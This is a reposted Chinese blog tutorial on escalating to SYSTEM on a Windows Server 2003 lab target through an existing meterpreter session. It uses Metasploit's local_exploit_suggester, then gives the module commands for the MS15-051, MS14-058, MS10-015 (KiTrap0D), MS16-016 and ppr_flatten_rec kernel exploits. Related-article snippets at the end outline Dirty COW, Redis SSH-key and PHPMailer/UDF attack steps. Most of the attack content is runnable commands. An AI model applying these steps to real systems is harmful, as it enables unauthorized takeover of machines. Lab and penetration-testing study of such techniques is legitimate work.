msf利用- windows内核提权漏洞

windows内核提权漏洞

环境:

Kali Linux(攻击机) 192.168.190.141

Windows2003SP2(靶机) 192.168.190.147

0x01寻找可利用的exp

实战中我们在拿到一个反弹shell后(meterpreter)下一步会进行提权操作,而metaspolit的内置模块Local Exploit Suggester。这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权。

如下图,有一个普通用户权限的会话

msf利用- windows内核提权漏洞

在拿到meterpreter会话的前提下,我们可以利用这个模块进行收集

msf利用- windows内核提权漏洞

可以看到我这里有和目标机的一个session会话,id为4,我们使用local_exploit_suggester模块


use post/multi/recon/local_exploit_suggester

set LHOST 192.168.190.141

set SESSION 

Exploit


 

如下图所示,它自动的为我们匹配出了一些可能的用于易受攻击目标提权的漏洞利用的exp模块。

msf利用- windows内核提权漏洞

0x02 利用exp提权

根据metaspolit的内置模块Local Exploit Suggester模块列出的可利用模块,我们来进行提权,提权成功后会返回新的、提升权限成功后的session会话。

选取了几个常见的可利用的模块来进行提权演示。

 

Windows ClientCopyImage Win32k Exploit(ms15_051)
Windows内核模式驱动程序中的漏洞让攻击者可以进行提权。
这个模块利用了win32k.sys内核模式驱动程序中不正确的对象处理。

 

使用模块 查看设置的参数

msf利用- windows内核提权漏洞

设置参数 提权

use exploit/windows/local/ms15_051_client_copy_image

set lhost 192.168.190.141

set session 

exploit

msf利用- windows内核提权漏洞

Windows TrackPopupMenu Win32k NULL Pointer Dereference(ms14_058)
该模块利用了win32k.sys中的NULL Pointer Dereference,这个漏洞可以通过使用TrackPopupMenu来触发。在特定情况下,可以在xxxSendMessage Timeout上滥用NULL Pointer Dereference来获取任意代码执行。
这个模块已经在Windows XP SP3,Windows Server 2003 SP2,Windows7 SP1,Windows Server2008 32位和Windows Server2008R2 SP164位上测试过。

use exploit/windows/local/ms14_058_track_popup_menu

set lhost 192.168.190.141

set session 

exploit
 

msf利用- windows内核提权漏洞

通过KiTrap0D进行Windows系统提权(ms10_015)
这个模块会通过Kitrap0D这个exp来生成一个SYSTEM权限的新会话,如果当前会话已经是SYSTEM权限,那么这个脚本将不起作用。这个脚本依赖于kitrap0d.x86.dll这个文件,而且不支持64位的Windows操作系统。
该模块已经在存在漏洞的Windows Server 2003,Windows Server 2008,Windows7和XP上测试过,只限32位操作系统。

use exploit/windows/local/ms10_015_kitrap0d

set lhost 192.168.190.141

set session 

exploit

msf利用- windows内核提权漏洞

mrxdav.sys WebDav本地提权MS16-016
这个exp利用的是mrxdav.sys中的漏洞,漏洞编号是MS16-016。该模块会在目标主机上生成一个进程,并通过在特权进程的环境下执行指定的payload来提权。
该模块在存在漏洞的Windows7 SP1 x86架构上测试过可行。

use exploit/windows/local/ms16_016_webdav

set lhost 192.168.190.141

set session 

exploit

msf利用- windows内核提权漏洞

EPATHOBJ::pprFlattenRec本地提权
这个漏洞是由于EPATHOBJ::pprFlattenRec使用了未初始化的数据而产生的,该漏洞可以对内存产生破坏。
而我们的这个脚本就是利用这个漏洞来提权的。

这个模块已经在Windows XP SP3,Windows2003SP1和Windows7SP1上成功执行。

use exploit/windows/local/ppr_flatten_rec

set lhost 192.168.190.141

set session 

exploit
 

因为实验是sp2就没有成功

msf利用- windows内核提权漏洞

文章来源地址https://www.yii666.com/article/332418.html文章地址https://www.yii666.com/article/332418.html网址:yii666.com<网址:yii666.com文章来源地址:https://www.yii666.com/article/332418.html

版权声明:本文内容来源于网络,版权归原作者所有,此博客不拥有其著作权,亦不承担相应法律责任。文本页已经标记具体来源原文地址,请点击原文查看来源网址,站内文章以及资源内容站长不承诺其正确性,如侵犯了您的权益,请联系站长如有侵权请联系站长,将立刻删除

msf利用- windows内核提权漏洞-相关文章

  1. CVE-2017-1000405 利用脏牛漏洞Linux提权复现

    当前路径: /var/www磁盘列表: /系统信息: Linux zico 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64当前用户: www-data执行exp c 文件  影响版本低于3.9的linux内核把此文件另存为上传后缀 .c执行gcc 编译gcc  -pthread 1.c -o dirty(编译后文件) -lcrypt提示File /tmp/passwd.bak alread

  2. 利用linux漏洞进行提权

    RHEL5—RHEL6下都可以提权本人测试环境CenOS6.5:该方法只能用作与有root用户切换到普通用户的环境,如果是普通用户直接登录在执行最后一步的时候直接退出登录$ mkdir /tmp/exploit$ ln /bin/ping /tmp/exploit/target$ exec 3 /tmp/exploit/target$ ll /proc/$$/fd/3$ rm -rf /tmp/exploit/$ ll /proc/$$/fd/3$ vim payloa

  3. 记一次 Raven2 渗透(phpmailer漏洞+UDF提权)

    目录:1. 寻找IP2.dirb目录爆破2.PHPMailer漏洞反弹得到shell3.python版本的exp修改4.查看wordpress的wp-config.php配置文件得到数据库账号和密码5.使用LinEnum.sh对linux进行信息收集6.mysqlUDF提权,kali对EXP的编译7.给程序chmod u+s 增加suid权限,可以以root来运行8.利用带有suid标志的find命令进行命

  4. Redis 未授权访问漏洞批量提权

    一.getshell前提①能有对 /root/.ssh/目录写入的权限②目标机开启22端口二.安装依赖三.使用四.创建ssh密钥五.启动脚本将ip列表填入ip.txt,然后就可以跑了。 成功的将会输出到success.txt,执行成功但是ssh连接失败的会存储在unconnect.txt,操作失败的会存储在fail.txt。原文链接:http://

  5. msf利用- windows内核提权漏洞

    windows内核提权漏洞环境:Kali Linux(攻击机) 192.168.190.141Windows2003SP2(靶机) 192.168.190.1470x01寻找可利用的exp实战中我们在拿到一个反弹shell后(meterpreter)下一步会进行提权操作,而metaspolit的内置模块Local Exploit Suggester。这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为

  6. windwos下基于exp的提权

    00x1:本文是基于windwos 补丁的漏洞提权。其实是一件很简单的工作:如果看成数据库的3张表分别是:未打补丁表,补丁漏洞表,漏洞利用提权程序表。为一一对应关系,所以就是资源的掌握,以及效率的问题00x2:1.微软官方漏洞时刻表:2.快速查找未打到补丁脚本:systeminfomicropoor.

  7. [提权]Windows COM组件提权漏洞 (CVE-2017-0213)

    0x01 简介COM组件是微软开发的一种新软件开发技术,在这个COM框架的下,可以开发出多功能的组件,可以根据自己的需求进行定制开发,替换旧的组件,多个功能组件组合到一起,从而形成了一个复杂的定制化多功能系统。0x02 影响版本0x03 实验步骤操作机:Windows 7 SP1步骤1:利

  8. metasploit下Windows下多种提权方式

    前言当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全权限,你需要绕过限制,获取本来没有的一些权限,这些权限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病毒。Metasploit有很多种后渗透方法,可以用于对目标

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信图片_20190322181744_03.jpg

微信扫一扫打赏

请作者喝杯咖啡吧~

支付宝扫一扫领取红包,优惠每天领

二维码1

zhifubaohongbao.png

二维码2

zhifubaohongbao2.png